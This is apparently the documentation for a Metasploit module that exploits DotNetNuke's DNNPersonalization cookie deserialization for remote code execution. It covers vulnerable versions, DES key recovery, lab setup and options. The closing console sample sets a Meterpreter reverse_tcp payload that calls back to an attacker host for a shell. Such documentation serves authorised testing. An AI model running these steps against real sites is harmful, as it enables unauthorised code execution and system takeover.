This module exploits a deserialization vulnerability in DotNetNuke (DNN) versions 5.0.0 to 9.3.0-RC. Vulnerable versions store profile information for users in the DNNPersonalization cookie as XML.
The expected structure includes a "type" attribute to instruct the server which type of object to create on deserialization. The cookie is processed by the application whenever it attempts to load the current user's profile data, which occurs when DNN is configured to handle 404 errors with its built-in error page (default configuration). An attacker can leverage this vulnerability to execute arbitrary code on the system.
### DNN v5.0.0 - v9.1.0
**CVE-2017-9822**:
Directly exploitable.
### DNN v9.1.1 - v9.2.1
**CVE-2018-15811**, **CVE-2018-15812**:
The patch for CVE-2017-9822 used a weak encryption algorithm (DES) and an encryption key of low entropy. Furthermore, if the target site is configured to use Verified Registration, the plaintext value of the registration verification code is exposed on the user profile page. Since the verification code is encrypted using the same algorithm and key as the DNNPersonalization cookie, a known-plaintext attack can be used to recover the key and re-exploit CVE-2017-9822 with an encrypted cookie. In some cases (v9.2.0+) a valid .DOTNETNUKE session token is also required for exploitation.
### DNN v9.2.2 - v9.3.0-RC
**CVE-2018-18325**, **CVE-2018-18326**:
The implemented patch for CVE-2018-15811 and CVE-2018-15812 did not prevent exploitation. The patch changed the encryption key used to encrypt and decrypt the DNNPersonalization cookie; however, this encryption key was still derived from the key used to encrypt and decrypt the registration verification code and the strength of the encryption algorithm was not increased (DES). Additional changes were made to prevent the full plaintext of the verification code from being disclosed. A partial plaintext value was still disclosed on the user profile page. Due to the project being open-source, it was possible to determine the format of the rest of the plaintext verification code. Using a list of obtained verification codes and the known partial plaintext value, it is possible to reduce the number of potential encryption keys through offline processing to a point where trying to re-exploit CVE-2017-9822 with each potential key becomes a feasible attack.
## Vulnerable Application
On a Windows machine, download the "Install" package from here:
You will need SQL Server 2005/2008/2008R2/2012 or 2016 installed.
Log in as the super user account and make sure the 404 error page is set to the built-in 404 Error Page.
Typically, this is already set as the default setting, but during testing I encountered an edge case where an issue during installation caused this value to be set to "None Specified".
Additionally, if you are testing this module from a machine other than the host that the application is installed on, you will need to configure the Site Alias so that it is accessible using a hostname other than `localhost`. Additional firewall rules may need to be configured to allow web access, depending on how you set up the application in IIS.
This module has been tested on DNN v7.0.0 - v9.3.0-RC running on Windows Server 2016.
### v5.0.0 - v9.1.0
No additional configuration required.
### v9.1.1+
While logged in as the super user account, configure the application to use Verified registration. You will also need to configure valid SMTP server settings in order to receive the registration email that contains the verification code.
From v9.2.2 onward, the `userId` portion of the verification plaintext is a randomly generated GUID rather than an integer, so only the `{portalID}-` prefix of the verification plaintext is known. By providing a list of several verification codes, it is possible to reduce the number of potential encryption key values to a feasible amount. Once the list of encryption keys has been reduced, the module tests each key until an HTTP callback is received on port `8080` indicating which key worked. The final exploit payload is then encrypted using the recovered key and sent to the server, resulting in a shell.
## Options
**DRY_RUN**
Set this to `true` to generate a payload but not send the exploit to the target server. Default value is `false`.
**ENCRYPTED**
Set this to `true` for targets running v9.1.1+. Default value is `false`.
**IV**
The initialization vector to use for encrypting the payload. If specified along with `KEY`, the `VERIFICATION_CODE` and `VERIFICATION_PLAIN` options will be ignored.
**KEY**
The key to use for encryption. If specified along with `IV`, the `VERIFICATION_CODE` and `VERIFICATION_PLAIN` options will be ignored.
**SESSION_TOKEN**
The .DOTNETNUKE session cookie value to use when submitting the payload to the server. Required for targets running v9.2.0+.
**SRVPORT**
The server port to listen on for HTTP callbacks when testing candidate encryption keys against targets running v9.2.2 - v9.3.0-RC. Default value is `8080`.
**TARGETURI**
Path to a page that will result in a DNN 404 Error Page. The default location is `/__`.
**VERIFICATION_CODE**
The verification code received in an email, or the full path to a file containing multiple verification codes.
**VERIFICATION_PLAIN**
The known (full or partial) plaintext of the encrypted verification code. Typically in the format `{portalID}-{userID}`, where portalID is an integer and userID is either an integer (v9.1.1 - v9.2.1) or a GUID (v9.2.2+).
## Scenarios
### v5.1.0 - v9.1.0
Expected output:
```
msf5 > use exploit/windows/http/dnn_cookie_deserialization_rce
msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set RHOSTS 192.168.31.131
msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set RPORT 8083
msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set PAYLOAD windows/meterpreter/reverse_tcp
msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set LHOST 192.168.31.128
msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set LPORT 443
[!] DNN Version Found: v9.2.0+ - Requires ENCRYPTED and SESSION_TOKEN. Setting target to 3 (v9.2.0 - v9.2.1). Site may also be 9.2.2 - try setting target 4 and supply a file of verification codes, or specify valid Key and IV values.